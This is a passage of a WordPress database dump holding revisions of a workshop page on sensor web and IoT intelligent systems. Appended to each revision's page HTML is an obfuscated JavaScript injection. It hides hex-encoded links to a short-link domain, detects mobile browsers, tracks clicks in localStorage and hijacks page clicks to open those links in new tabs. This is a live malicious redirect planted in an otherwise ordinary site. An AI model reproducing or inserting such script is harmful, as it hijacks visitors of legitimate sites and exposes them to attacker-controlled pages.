\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:13:53','2022-12-06 05:13:53','',3386,'https://gsw2023.com/?p=3413',0,'revision','',0),
(3414,1,'2022-12-06 05:14:43','2022-12-06 05:14:43','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:14:43','2022-12-06 05:14:43','',3386,'https://gsw2023.com/?p=3414',0,'revision','',0),
(3415,1,'2022-12-06 05:15:15','2022-12-06 05:15:15','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"4x6\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 